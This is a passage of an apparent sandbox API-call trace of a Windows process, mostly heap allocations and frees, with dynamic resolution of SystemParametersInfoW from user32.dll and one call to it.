Flags=0x0, Size=0x10) returned 0x2aab470 [0236.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab590 [0236.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab650 [0236.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0236.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0236.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0236.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0236.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0236.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0236.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0236.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0236.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0236.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0236.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0236.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0236.912] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0236.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0236.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0236.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0236.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0236.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0236.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0236.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0236.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0236.913] CharUpperBuffW (in: lpsz="SSA0F00F04C39", cchLength=0xd | out: lpsz="SSA0F00F04C39") returned 0xd [0236.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0236.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0236.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0236.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0236.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0236.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0236.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0236.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0236.913] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0236.913] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0236.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0236.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0236.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0236.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0236.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0236.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0236.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0236.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0236.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0236.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0236.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0236.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0236.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0236.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0236.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0236.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0236.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0236.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0236.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0236.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0236.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0236.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0236.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0236.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0236.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0236.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0236.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0236.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0236.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0236.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0236.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0236.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0236.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0236.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0236.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0236.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0236.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0236.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0236.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0236.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0236.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0236.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0236.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0236.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0236.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0236.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0236.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0236.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0236.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0236.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0236.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0236.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0236.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0236.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0236.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0236.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0236.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0236.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0236.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0236.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0236.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0236.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0236.915] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0236.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0236.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0236.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0236.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0236.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0236.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0236.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0236.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0236.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0236.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0236.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0236.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0236.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0236.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0236.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0236.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0236.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0236.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0236.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0236.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0236.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0236.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0236.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0236.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0236.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0236.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0236.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0236.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0236.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0236.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0236.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0236.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0236.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0236.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0236.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0236.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0236.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0236.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0236.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0236.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0236.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0236.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0236.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0236.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0236.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0236.917] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76240000 [0236.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0236.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0236.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0236.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f6ee0 [0236.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x29f6ee0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0236.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0236.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0236.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0236.918] GetProcAddress (hModule=0x76240000, lpProcName="SystemParametersInfoW") returned 0x7626f210 [0236.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0236.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0236.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0236.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0236.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0236.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0236.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0236.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0236.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0236.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0236.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0236.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0236.918] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0237.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865d30 [0237.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f00 [0237.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0237.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0237.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0237.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0237.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0237.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0237.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0237.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0237.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0237.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0237.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0237.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0237.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0237.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0237.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0237.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0237.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0237.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0237.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0237.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0237.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0237.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0237.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0237.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0237.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0237.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0237.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0237.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0237.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0237.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0237.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0237.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0237.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0237.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0237.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0237.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0237.003] FreeLibrary (hLibModule=0x76240000) returned 1 [0237.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0237.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0237.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0237.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0237.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0237.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0237.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0237.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0237.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0237.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0237.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0237.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0237.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0237.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0237.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0237.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0237.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0237.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0237.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0237.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0237.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0237.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0237.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0237.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0237.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0237.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0237.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0237.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0237.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0237.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: 